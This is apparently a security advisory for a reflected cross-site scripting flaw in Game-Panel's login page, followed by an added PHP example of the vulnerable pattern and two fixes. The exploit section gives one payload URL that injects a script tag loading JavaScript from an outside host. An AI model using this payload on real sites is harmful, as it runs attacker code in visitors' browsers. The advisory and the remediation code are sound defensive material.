--------
summary
software: Game-Panel
vendor's website: http://game-panel.com
versions: <= 2.6.1
class: remote
status: unpatched
exploit: available
solution: not available
discovered by: sycko
risk level: medium
--------
description
Game-Panel uses a global variable to print error messages on its login page. The value can be set through the message request parameter and is written into the page as-is, allowing execution of JavaScript in the browser of anyone who follows a crafted link.
--------
exploit(s)
http://example.com/login.php?message=%3CSCRIPT%20SRC=http://notlegal.ws/xss.js%3E%3C/SCRIPT%3E
--------
credit
author(s): retard, jim, and sycko
email: retard@30gigs.com
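
The pattern described above and two ways to close it, as an added example that is not Game-Panel source code and not from the advisory's authors. Only login.php and the message parameter come from the advisory; the function names, the message keys, the HTML wrapper and the register_globals-style cause are assumptions.

```php
<?php
// Added illustration, not Game-Panel code. All names below are hypothetical.

// BEFORE (assumed shape of the flaw): a request-populated global such as
// $message is concatenated into the login page without encoding.
function render_message_vulnerable(string $message): string
{
    return '<div class="error">' . $message . '</div>';
}

// AFTER, option 1: encode for the HTML body context at the point of output.
// ENT_QUOTES also covers attribute contexts; ENT_SUBSTITUTE keeps invalid
// UTF-8 from turning the whole string into an empty one.
function render_message_escaped(string $message): string
{
    $safe = htmlspecialchars($message, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<div class="error">' . $safe . '</div>';
}

// AFTER, option 2: the URL carries only a key and the text lives on the
// server, so no request-controlled string reaches the page at all.
const LOGIN_MESSAGES = [ // hypothetical keys and wording
    'badlogin' => 'Invalid username or password.',
    'expired'  => 'Your session has expired. Please log in again.',
];

function render_message_by_key(string $key): string
{
    $text = LOGIN_MESSAGES[$key] ?? 'Login failed.';
    return render_message_escaped($text);
}

// Read the parameter explicitly from the query string instead of trusting
// a global, and reject array input such as ?message[]=x.
$raw = $_GET['message'] ?? '';
if (!is_string($raw)) {
    $raw = '';
}

// Constructed sample input: harmless markup that shows whether tags survive.
$sample = '<i>markup</i>';
echo render_message_vulnerable($sample), "\n"; // tags reach the page intact
echo render_message_escaped($sample), "\n";    // tags arrive as &lt;i&gt;...
echo render_message_by_key($raw), "\n";        // unknown key: generic text
```

Option 2 is the stronger fix for a login page, since existing links that pass free text in message stop rendering it; option 1 keeps the current URL format working.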